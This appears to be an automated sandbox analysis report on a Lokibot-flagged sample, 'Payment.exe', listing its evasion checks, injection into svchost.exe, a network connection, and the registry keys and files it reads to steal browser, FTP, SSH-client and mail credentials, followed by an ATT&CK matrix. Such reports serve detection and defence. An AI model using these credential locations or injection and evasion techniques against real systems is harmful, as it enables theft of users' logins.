Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment.exe

API/Special instruction interceptor: Address: 1823244

Source: C:\Users\user\Desktop\Payment.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105443

Source: C:\Users\user\Desktop\Payment.exe

API coverage: 4.5 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 5020

Thread sleep time: -480000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0087445A
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087C6D1 FindFirstFileW,FindClose,	0_2_0087C6D1
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0087C75C
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0087EF95
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0087F0F2
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0087F3F3
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_008737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008737EF
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00873B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00873B12
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0087BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0087BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008149A0

Source: C:\Windows\SysWOW64\svchost.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: svchost.exe, 00000001.00000002.2981704968.0000000003200000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Payment.exe

API call chain: ExitProcess graph end node

graph_0-104217

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00883F09 BlockInput,

0_2_00883F09

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00813B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00813B3A

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00845A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00845A7C

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00814B37 LoadLibraryA,GetProcAddress,

0_2_00814B37

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_01823510 mov eax, dword ptr fs:[00000030h]	0_2_01823510
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_018234B0 mov eax, dword ptr fs:[00000030h]	0_2_018234B0
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_01821E70 mov eax, dword ptr fs:[00000030h]	0_2_01821E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]	1_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63060 mov eax, dword ptr fs:[00000030h]	1_2_00C63060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63060 mov eax, dword ptr fs:[00000030h]	1_2_00C63060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63060 mov eax, dword ptr fs:[00000030h]	1_2_00C63060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63060 mov eax, dword ptr fs:[00000030h]	1_2_00C63060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64410 mov eax, dword ptr fs:[00000030h]	1_2_00C64410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64410 mov eax, dword ptr fs:[00000030h]	1_2_00C64410
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63540 mov eax, dword ptr fs:[00000030h]	1_2_00C63540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63540 mov eax, dword ptr fs:[00000030h]	1_2_00C63540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C63540 mov eax, dword ptr fs:[00000030h]	1_2_00C63540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C656A0 mov eax, dword ptr fs:[00000030h]	1_2_00C656A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C656A0 mov ecx, dword ptr fs:[00000030h]	1_2_00C656A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64610 mov eax, dword ptr fs:[00000030h]	1_2_00C64610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64610 mov eax, dword ptr fs:[00000030h]	1_2_00C64610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64610 mov eax, dword ptr fs:[00000030h]	1_2_00C64610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C64610 mov eax, dword ptr fs:[00000030h]	1_2_00C64610

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_008680A9

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083A124 SetUnhandledExceptionFilter,	0_2_0083A124
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_0083A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0083A155
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C65848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00C65848
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C633C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	1_2_00C633C0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.64.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payment.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E65008

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008687B1 LogonUserW,

0_2_008687B1

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00813B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00813B3A

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_008148D7

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00874C27 mouse_event,

0_2_00874C27

Source: C:\Users\user\Desktop\Payment.exe

Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00867CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00867CAF

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0086874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0086874B

Source: Payment.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Payment.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_0083862B cpuid

0_2_0083862B

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00844E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00844E87

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00851E06 GetUserNameW,

0_2_00851E06

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_00843F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00843F3A

Source: C:\Users\user\Desktop\Payment.exe

Code function: 0_2_008149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008149A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 6096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 2492, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.2981726781.000000000322A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		1_2_0040D069

Source: Payment.exe	Binary or memory string: WIN_81
Source: Payment.exe	Binary or memory string: WIN_XP
Source: Payment.exe	Binary or memory string: WIN_XPe
Source: Payment.exe	Binary or memory string: WIN_VISTA
Source: Payment.exe	Binary or memory string: WIN_7
Source: Payment.exe	Binary or memory string: WIN_8
Source: Payment.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.Payment.exe.1830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1752543967.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2981317684.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00886283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00886283
Source: C:\Users\user\Desktop\Payment.exe	Code function: 0_2_00886747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00886747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C66AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00C66AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C66BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00C66BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00C66B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	1_2_00C66B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
